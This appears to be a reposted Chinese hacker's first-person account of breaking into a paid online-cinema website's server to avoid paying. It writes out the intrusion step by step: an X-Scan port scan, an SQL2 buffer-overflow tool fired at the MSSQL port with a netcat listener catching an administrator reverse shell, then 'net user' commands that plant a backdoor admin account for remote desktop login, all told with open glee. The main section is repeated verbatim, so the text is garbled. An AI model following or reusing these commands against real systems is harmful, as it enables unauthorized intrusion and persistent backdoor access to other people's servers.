最近對(duì)網(wǎng)上看電影比較感興趣，于是登錄至某“在線影院”。本以為是免費(fèi)，誰知問我要賬號(hào)和密碼，我可不想為這個(gè)掏錢。怎么辦？先探探路。對(duì)我而言，入侵的過程是充滿樂趣的，它刺激著我大腦的每一根神經(jīng)，讓我興奮無比。我喜歡體味這種思維無拘放蕩的快感，我喜歡沉醉其中。這是黑客營(yíng)人的風(fēng)格。于是，X-Scan開始勤懇地跑在了我的桌面上。 　　破門：久違的溢出工具 　　用X-Scan對(duì)該站點(diǎn)的Server掃描結(jié)果出來了，開的端口還不少呢：53、80、1433、3389?？刹]有報(bào)告說發(fā)現(xiàn)有弱口令，看來網(wǎng)管還算比較有責(zé)任心。但開了3389端口，意味著可以遠(yuǎn)程登錄，這可是微軟給所有Windows用戶獻(xiàn)上的最大的“木馬”。 　　通過觀察，我發(fā)現(xiàn)只有在1433端口上下點(diǎn)工夫，想想辦法。何不用SQL2溢出工具試試？ 　　先開一個(gè)cmd窗口，祭出寶刀netcat，在命令提示符下敲入“netcat -l -p 99”，監(jiān)聽本地99端口。接著該SQL2出馬了。再打開一個(gè)cmd窗口，鍵入“sql2 218.147.*.* 61.157.*.* 0”，其中218.147.*.*是對(duì)方IP，61.157.*.*是我自己的IP，回車后提示package sent successful。再回過頭去看看監(jiān)聽本地端口的netcat，已經(jīng)變成了C:\WinNT\system32\_，這就是對(duì)方機(jī)器的系統(tǒng)文件夾了，看來是成功溢出了，就這么簡(jiǎn)單。 　　我很幸運(yùn)地得到了對(duì)方的一個(gè)Shell，而且還是administrator權(quán)限的。接下來的操作就輕車熟路了，添加用戶，提升權(quán)限：在提示符下鍵入“net user hacker 12345 /add”（在對(duì)方機(jī)器里創(chuàng)建一個(gè)名為hacker，密碼為12345的用戶），再鍵入“net localgroup administrators hacker /add”（把用戶hacker加入到管理員組），接下來就該是3389遠(yuǎn)程登錄了。 　　破門：久違的溢出工具 　　用X-Scan對(duì)該站點(diǎn)的Server掃描結(jié)果出來了，開的端口還不少呢：53、80、1433、3389?？刹]有報(bào)告說發(fā)現(xiàn)有弱口令，看來網(wǎng)管還算比較有責(zé)任心。但開了3389端口，意味著可以遠(yuǎn)程登錄，這可是微軟給所有Windows用戶獻(xiàn)上的最大的“木馬”。 　　通過觀察，我發(fā)現(xiàn)只有在1433端口上下點(diǎn)工夫，想想辦法。何不用SQL2溢出工具試試？ 　　先開一個(gè)cmd窗口，祭出寶刀netcat，在命令提示符下敲入“netcat -l -p 99”，監(jiān)聽本地99端口。接著該SQL2出馬了。再打開一個(gè)cmd窗口，鍵入“sql2 218.147.*.* 61.157.*.* 0”，其中218.147.*.*是對(duì)方IP，61.157.*.*是我自己的IP，回車后提示package sent successful。再回過頭去看看監(jiān)聽本地端口的netcat，已經(jīng)變成了C:\WinNT\system32\_，這就是對(duì)方機(jī)器的系統(tǒng)文件夾了，看來是成功溢出了，就這么簡(jiǎn)單。 　　我很幸運(yùn)地得到了對(duì)方的一個(gè)Shell，而且還是administrator權(quán)限的。接下來的操作就輕車熟路了，添加用戶，提升權(quán)限：在提示符下鍵入“net user hacker 12345 /add”（在對(duì)方機(jī)器里創(chuàng)建一個(gè)名為hacker，密碼為12345的用戶），再鍵入“net localgroup administrators hacker /add”（把用戶hacker加入到管理員組），接下來就該是3389遠(yuǎn)程登錄了。

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。